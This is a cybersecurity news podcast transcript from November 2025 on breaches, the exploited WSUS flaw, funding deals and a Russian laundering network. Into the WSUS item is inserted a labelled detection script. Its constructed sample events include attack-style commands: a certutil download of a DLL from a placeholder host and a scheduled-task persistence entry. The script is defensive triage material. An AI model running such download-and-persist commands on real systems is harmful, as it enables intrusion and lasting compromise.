The CyberWire Daily Podcast 11.24.25
Ep 2440 | 11.24.25

Inside job interrupted.

Transcript

CrowdStrike fires an insider who allegedly shared screenshots with hackers. Google agrees, it wasn’t Salesforce. Cox Enterprises confirms Oracle EBS breach. Alleged Transport for London hackers plead not guilty. Hackers exploit new WSUS bug to deploy ShadowPad backdoor. Iberia discloses breach of customer data. Harvard discloses voice-phishing breach exposing alumni and donor data. We have our Monday Business Briefing. Our guest today is Brandon Karpf, friend of the show, discussing maritime GPS jamming and spoofing. And the launderers who wanted a bank for Christmas.

Today is Monday, November 24th, 2025. I’m Maria Varmazis, host of T-Minus Space Daily, in for Dave Bittner as he’s defrosting his turkey. And this is your CyberWire Intel Briefing.

CrowdStrike fires insider who allegedly shared screenshots with hackers.

CrowdStrike has fired an insider who allegedly shared screenshots of internal systems with hackers, TechCrunch reports. The Scattered Lapsus$ Hunters published the screenshots in a Telegram channel last week, claiming to have gained access to CrowdStrike's systems after breaching Gainsight. CrowdStrike says these claims are false, stating that its "systems were never compromised and customers remained protected throughout." The company says the hackers obtained the screenshots from a malicious insider, whose access has been terminated.

BleepingComputer cites a ShinyHunters member who said the group offered the insider $25,000 to grant access to CrowdStrike's networks, but the insider was detected and locked out before they could do so. These details haven't been confirmed by CrowdStrike.

Google agrees, it wasn’t Salesforce.

In related news, Google’s Threat Intelligence Group reports hackers accessed and stole data from over 200 customer instances of Salesforce via third-party apps published by Gainsight. The campaign, claimed by the Scattered Lapsus$ Hunters collective (including ShinyHunters), exploited integrations—not the core Salesforce platform—to infiltrate high-profile targets such as DocuSign, LinkedIn and Verizon. Salesforce says the breach “is not the result of any vulnerability in the Salesforce platform.”

Cox Enterprises confirms Oracle EBS breach.

US-based global conglomerate Cox Enterprises has confirmed that its Oracle E-Business Suite (EBS) instance was breached, leading to theft of personal information belonging to nearly 9,500 individuals, SecurityWeek reports. Cox was one of more than 100 entities named by the Clop ransomware gang as victims of a campaign targeting a zero-day flaw in Oracle EBS. Logitech, Harvard University, the Washington Post, Envoy Air, and Mazda have also confirmed they were targeted by the campaign. Mazda told SecurityWeek, however, that its defenses prevented the attackers from exfiltrating information.

Alleged Transport for London hackers plead not guilty.

Two alleged Scattered Spider hackers have pleaded not guilty to charges related to last year's cyberattack against Transport for London, the BBC reports. The defendants, nineteen-year-old Thalha Jubair from East London and eighteen-year-old Owen Flowers from the West Midlands, were arrested last year and charged with offenses under the Computer Misuse Act. Flowers has also been charged with attempting to hack two US-based healthcare entities. The two defendants will be held in custody until their trial in June 2026.

Hackers exploit new WSUS bug to deploy ShadowPad backdoor.

Attackers have exploited a recently patched vulnerability in Windows Server Update Services (WSUS) — CVE-2025-59287, rated CVSS 9.8 — which enables unauthenticated remote code execution at the SYSTEM level. Once inside WSUS-enabled servers, the adversary deployed the sophisticated ShadowPad backdoor by chaining tools like PowerCat, certutil and curl to download and sideload a malicious DLL, which then persists via scheduled tasks and system-process injection.

CISA has added the flaw to its Known Exploited Vulnerabilities catalog, and organizations using WSUS are urged to patch immediately, restrict access and audit for abnormal activity.
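The "audit for abnormal activity" advice above maps to a concrete detection: a WSUS host process should not be spawning shells, and those shells should not be pulling files with certutil or curl and then creating scheduled tasks. The following is an added example, not code from the podcast or from CISA, that runs a small triage rule over constructed Sysmon-style process-creation events. The parent-process names (w3wp.exe, wsusservice.exe), the field layout and every log line are assumptions made for this example; adapt them to your telemetry.

```python
"""Triage rule for the WSUS post-exploitation chain described in the report:
WSUS process -> shell -> certutil/curl download -> scheduled-task persistence.
All events below are constructed for this example (not real telemetry)."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Assumption: WSUS runs under IIS (w3wp.exe) and its own service host.
WSUS_PARENTS = {"wsusservice.exe", "w3wp.exe"}
SHELLS = {"cmd.exe", "powershell.exe"}
DOWNLOADERS = {"certutil.exe", "curl.exe"}        # named in the reporting
URL = re.compile(r"https?://", re.I)
SCHTASKS_CREATE = re.compile(r"/create\b", re.I)


def basename(path):
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(ev):
    """Return the list of suspicious tags for one process-creation event."""
    tags = []
    image, parent = basename(ev["image"]), basename(ev["parent_image"])
    cmd = ev["cmdline"]
    if parent in WSUS_PARENTS and image in SHELLS:
        tags.append("wsus_spawned_shell")
    if image in DOWNLOADERS and URL.search(cmd):
        tags.append("lolbin_download")
    if image == "schtasks.exe" and SCHTASKS_CREATE.search(cmd):
        tags.append("schtask_persistence")
    return tags


def triage(events, window=timedelta(minutes=30)):
    """Tag events, then correlate per host: a WSUS-spawned shell followed
    within `window` by a download and a task creation is the full chain.
    Returns (findings, hosts_with_full_chain)."""
    findings, per_host = [], defaultdict(list)
    for ev in events:
        tags = classify(ev)
        if tags:
            findings.append({"host": ev["host"], "ts": ev["ts"],
                             "tags": tags, "cmdline": ev["cmdline"]})
            per_host[ev["host"]].append((ev["ts"], set(tags)))
    chains = []
    for host, hits in per_host.items():
        hits.sort(key=lambda h: h[0])
        for i, (t0, tags0) in enumerate(hits):
            if "wsus_spawned_shell" not in tags0:
                continue
            seen = set()
            for t, tags in hits[i:]:
                if t - t0 <= window:
                    seen |= tags
            if {"lolbin_download", "schtask_persistence"} <= seen:
                chains.append(host)
                break
    return findings, sorted(chains)


def ev(host, ts, parent, image, cmdline):
    return {"host": host, "ts": datetime.fromisoformat(ts),
            "parent_image": parent, "image": image, "cmdline": cmdline}


# Constructed sample: one WSUS server showing the full chain, one admin
# workstation with a benign curl download, one benign admin shell on WSUS.
SAMPLE_EVENTS = [
    ev("wsus01", "2025-11-20T10:00:00", r"C:\Windows\System32\inetsrv\w3wp.exe",
       r"C:\Windows\System32\cmd.exe", "cmd.exe /c whoami"),
    ev("wsus01", "2025-11-20T10:02:00", r"C:\Windows\System32\cmd.exe",
       r"C:\Windows\System32\certutil.exe",
       "certutil -urlcache -split -f http://placeholder.example/x.dll C:\\Windows\\Temp\\x.dll"),
    ev("wsus01", "2025-11-20T10:05:00", r"C:\Windows\System32\cmd.exe",
       r"C:\Windows\System32\schtasks.exe",
       'schtasks /create /tn "Updater" /tr C:\\Windows\\Temp\\run.exe /sc minute'),
    ev("ws02", "2025-11-20T11:00:00", r"C:\Windows\explorer.exe",
       r"C:\Windows\System32\curl.exe", "curl -o tool.msi https://placeholder.example/tool.msi"),
    ev("wsus02", "2025-11-20T11:30:00", r"C:\Windows\explorer.exe",
       r"C:\Windows\System32\cmd.exe", "cmd.exe"),
]

if __name__ == "__main__":
    findings, chains = triage(SAMPLE_EVENTS)
    for f in findings:
        print(f["host"], f["ts"], f["tags"], f["cmdline"])
    print("hosts with full WSUS->download->persistence chain:", chains)
```

The per-event tags are deliberately noisy on their own (an administrator using curl is normal); the signal is the correlation of a shell whose parent is the WSUS host process with a download and a task creation on the same machine in a short window, which is the sequence the report describes.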

Iberia discloses breach of customer data.

Spanish airline Iberia has disclosed a breach affecting customers' names, email addresses, and loyalty card identification numbers, BleepingComputer reports. The incident did not affect login credentials or financial details. The airline has attributed the breach to a third-party vendor, saying in a statement, "As soon as we became aware of the incident, we activated our security protocol and procedures and implemented all necessary technical and organizational measures to contain it, mitigate its effects, and prevent its recurrence."

BleepingComputer notes that a threat actor posted on a criminal forum claiming to have stolen data from Iberia and offering to sell it for $150,000. It's unclear if these claims are related, however, since the threat actor claimed to have breached Iberia's own servers and stolen technical details related to aircraft.

Harvard discloses voice-phishing breach exposing alumni and donor data.

Harvard University has disclosed that its Alumni Affairs & Development systems were compromised following a voice-phishing attack on November 18, 2025, which allowed an unauthorized party to access data related to alumni, donors, students, faculty and staff. The exposed information includes email addresses, phone numbers, home and business addresses, donation and event-attendance records — but notably not Social Security numbers, payment card data or financial account credentials. The university is working with law-enforcement and third-party cybersecurity experts and has begun notifying affected individuals.

Business Briefing.

Last week’s Business Breakdown highlights just over $180 million raised across 7 investments and 3 acquisitions.

On the investment front, US-based social engineering defense company, Doppel, raised $70 million in a Series C round. With this new funding, Doppel aims to expand its Digital Risk Protection product portfolio, alongside expanding its existing Human Risk Management offerings.

Additionally, Bedrock Data, a US-based data security firm, raised $25 million in a Series A round. Through this funding, the company aims to accelerate product development timelines and invest in scaling its data security, integrations, classification, and AI governance. The company also aims to meet its growing enterprise demand for IaaS, PaaS, SaaS, and AI systems at the multi-petabyte scale.

For acquisitions, Cloudflare announced its intention to acquire Replicate, a US-based AI model development company. Through Replicate, Cloudflare is looking to expand its Cloudflare Workers offering to allow it to build scalable and reliable AI applications. Additionally, Cloudflare aims to enable developers to access AI models across the globe with minimal code.

And that wraps up this week’s Business Breakdown. For deeper analysis on major business moves shaping the cybersecurity landscape, subscribe to N2K Pro and check out TheCyberWire.com every Wednesday for the latest updates.

Stick around after the break: Dave Bittner and I recently sat down with Brandon Karpf, friend of the show, to discuss maritime GPS jamming and spoofing. And the launderers who wanted a bank for Christmas.

Dave Bittner and I recently sat down with Brandon Karpf, friend of the show, to discuss maritime GPS jamming and spoofing. Here’s our conversation.

That was Brandon Karpf, friend of the show, discussing maritime GPS jamming and spoofing.

The launderers who wanted a bank for Christmas.

On Christmas Day 2024, a Russia-linked crime network gifted itself something far more festive: a 75 percent stake in a Kyrgyzstani bank. The UK’s National Crime Agency says that “Merry Bank-mas” purchase became a convenient machine for washing cybercrime profits and channeling money into Moscow’s war chest. Operation Destabilise found the scheme began with low-paid couriers roaming 28 UK towns, collecting envelopes of cash from drug, firearms, and immigration crimes. That cash was flipped into crypto and funneled through Keremet Bank—the one they bought—to support Promsvyazbank, Russia’s military lender. At the top were two laundering crews: Smart, allegedly led by Ekaterina Zhdanova, and TGR, headed by George Rossi. Each leader worked alongside two partners, and all six are now sanctioned by the US Treasury. The network also crossed paths with figures linked to Russian intelligence, including a group led by convicted spy Orlin Roussev, and drew in Russian-Moldovan oligarch Ilan Shor and his sanctions-dodging crypto ventures. Couriers have already been jailed, including one caught with £750,000 at home and another pair who laundered £6 million under the guise of “war-related transfers.” With more than 120 arrests and millions seized, the NCA says its crackdown is tightening the pressure. And the money launderers? They know it.

And that’s the CyberWire.

For links to all of today’s stories, check out our Daily Briefing at the cyberwire dot com.

We’d love to know what you think of this podcast. Your feedback ensures we deliver the insights that keep you a step ahead in the rapidly changing world of cybersecurity. If you like the show, please share a rating and review in your podcast app. Please also fill out the survey in the show notes or send an email to cyberwire@n2k.com.


N2K’s senior producer is Alice Carruth. Our producer is Liz Stokes. We’re mixed by Elliott Peltzman and Tré Hester, with original music by Elliott Peltzman. Our executive producer is Jennifer Eiben. Peter Kilpe is our publisher, and I’m Maria Varmazis. Thanks for listening.